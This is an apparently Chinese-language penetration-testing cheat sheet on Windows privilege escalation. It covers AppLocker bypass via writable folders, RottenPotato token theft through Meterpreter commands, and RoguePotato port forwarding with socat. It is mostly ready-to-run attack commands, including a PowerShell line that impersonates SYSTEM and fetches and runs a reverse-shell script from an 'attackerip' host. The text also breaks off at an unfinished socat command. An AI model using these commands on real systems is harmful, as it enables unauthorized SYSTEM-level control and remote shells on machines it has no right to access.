WEB渗透Win提权篇-合集（上）

 完整20w字笔记： 夸克网盘分享

AppLocker

GPO
HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2（keys：Appx、Dll、Exe、Msi 和脚本）。
列出 AppLocker 规则
PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
AppLocker 绕过
默认情况下，C:\Windows不被阻止，C:\Windows\Tasks任何用户都可以写
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md

RottenPotato

https://github.com/foxglovesec/RottenPotato 
https://github.com/breenmachine/RottenPotatoNG
Meterpreter>getuid
Meterpreter>getprivs
Meterpreter>use incognito
Meterpreter>list_tokens -u
Meterpreter>upload /root/Desktop/rottenpotato.exe
Meterpreter>execute -HC -f rottenpotato.exe
Meterpreter>impersonate_token "NT AUTHORITY\\SYSTEM"

PS >Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
PS >Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
PS >Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://attackerip/Invoke-PowerShellTcp.ps1');\"};"

RoguePotato

Rogue Potato
https://github.com/antonioCoco/RoguePotato
要在远程机器上运行端口转发，必须使用端口 135 作为源端口
socat tcp-listen:135,reuseaddr,fork